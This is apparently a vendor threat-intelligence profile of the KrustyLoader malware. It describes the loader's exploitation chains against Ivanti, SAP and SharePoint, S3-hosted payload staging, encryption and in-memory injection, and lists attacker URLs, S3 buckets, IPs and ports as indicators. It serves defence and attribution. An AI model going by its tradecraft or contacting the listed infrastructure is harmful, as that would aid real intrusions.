KrustyLoader
KrustyLoader is a Rust-based initial-stage malware loader used to retrieve and launch second-stage payloads, most commonly the Sliver backdoor/C2 implant. It was first documented in January 2024 in compromises of Ivanti Connect Secure systems exploiting CVE-2024-21887 and CVE-2023-46805, and has since been observed in additional exploitation chains involving Ivanti Endpoint Manager Mobile (EPMM), Ivanti Sentry, SAP NetWeaver, and Microsoft SharePoint/ToolShell intrusions. Reported delivery mechanisms include abuse of web shells and JSP loaders, direct retrieval from Amazon S3 infrastructure, and downloads via built-in utilities such as wget, curl, and fetch. On compromised Ivanti EPMM systems, KrustyLoader was reported to retrieve an AES-128-CFB encrypted Sliver payload, decrypt it using a hardcoded key and IV, and inject it into memory as shellcode. One report described an embedded staging URL that was hex-encoded, XOR-encrypted with key 0x49, and then AES-128-CFB encrypted; a decrypted example URL was http://abbeglasses.s3.amazonaws[.]com/dSn9tM. Public S3 infrastructure associated with payload delivery included openrbf.s3.amazonaws.com, tnegadge.s3.amazonaws.com, fconnect.s3.amazonaws.com, trkbucket.s3.amazonaws.com, the-mentor.s3.amazonaws.com, and tkshopqd.s3.amazonaws.com. KrustyLoader has been consistently associated with the China-nexus threat actor UNC5221, also tracked as UTA0178 and in some reporting as QuietCrabs, and has appeared in broader Chinese espionage activity alongside malware such as Zingdoor and ShadowPad. It has been observed targeting internet-exposed edge and enterprise systems across sectors including government, telecom, healthcare, finance, logistics, manufacturing, and universities. Although some vendors described it as Linux malware, reporting also documented Windows samples in incidents attributed to QuietCrabs. High-confidence related infrastructure and observables mentioned in the content include AWS S3-hosted payloads, attacker IPs 27.25.148[.]183, 64.52.80[.]21:4444, 103.244.88[.]125:8080, and connectivity to 146.70.87.67:45020.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
5 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
On July 25, KrustyLoader was dropped by the attackers. KrustyLoader was first documented in January 2024. It is an initial-stage malware, written in Rust, which has the primary purpose of delivering a second-stage payload.
“EclecticIQ analysts observed the execution of KrustyLoader malware within compromised Ivanti EPMM systems… Once installed, KrustyLoader retrieves a second-stage payload — an AES-128-CFB encrypted version of the Sliver backdoor.” | On Thursday, May 15, 2025, Ivanti disclosed two critical vulnerabilities - CVE-2025-4427 and CVE-2025-4428 - affecting Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier. These vulnerabilities can be chained to achieve unauthenticated remote code execution (RCE) on exposed systems.
On Thursday, May 15, 2025, Ivanti disclosed two critical vulnerabilities - CVE-2025-4427 and CVE-2025-4428 - affecting Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier. These vulnerabilities can be chained to achieve unauthenticated remote code execution (RCE) on exposed systems. | “EclecticIQ analysts observed the execution of KrustyLoader malware within compromised Ivanti EPMM systems… Once installed, KrustyLoader retrieves a second-stage payload — an AES-128-CFB encrypted version of the Sliver backdoor.”
UNC5221 was seen abusing a webshell to execute remote commands and fetch from an AWS S3 infrastructure the Rust-based malware loader KrustyLoader, which is typically used for dropping Sliver backdoors.
UNC5221 was seen abusing a webshell to execute remote commands and fetch from an AWS S3 infrastructure the Rust-based malware loader KrustyLoader, which is typically used for dropping Sliver backdoors.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
On July 25, KrustyLoader was dropped by the attackers. KrustyLoader was first documented in January 2024. It is an initial-stage malware, written in Rust, which has the primary purpose of delivering a second-stage payload.
Techniques & procedures
9 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Initial Access
China-based attackers used the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East shortly after the vulnerability was publicly revealed and patched in July 2025... In these attacks, the attackers used other vulnerabilities for initial access and exploited SQL servers and Apache HTTP servers running the Adobe ColdFusion software to deliver their malware.
Execution
1 technique
Execution
Privilege Escalation
1 technique
Privilege Escalation
Stealth
5 techniques
Stealth
“Base64-encoded payload embedded in a GET request” and “Obfuscated Bash script downloading and executing a payload…”
“injects it directly into memory as shellcode… The resulting payload is loaded directly into memory and executed as shellcode”
KrustyLoader... can make a copy of itself and set itself up to self-delete when its activity is finished...
Discovery
1 technique
Discovery
Command and Control
2 techniques
Command and Control
“forming a reliable command-and-control (C2) mechanism using server-side Java injection” and repeated use of HTTP GET/curl/wget to retrieve payloads
KrustyLoader... can decrypt and download additional malware. Its previous activity has been linked to China-based threat actors, and in earlier campaigns it was also used to download the Sliver post-exploitation framework, which is also seen deployed against this target.
IOCs tracked for this family
8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
KrustyLoader is a loader malware used to download and execute additional payloads, such as the Sliver implant, after initial access.
Backdoor/loader deployed against edge networking devices by the QuietCrabs cluster.
KrustyLoader is a loader malware associated with the QuietCrabs threat actor, used to deploy additional payloads and facilitate further compromise. It has been observed in both Linux and Windows environments.
Symantec Exposes Chinese APT Overlap: Zingdoor, ShadowPad, and KrustyLoader Used in Global Espionage
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.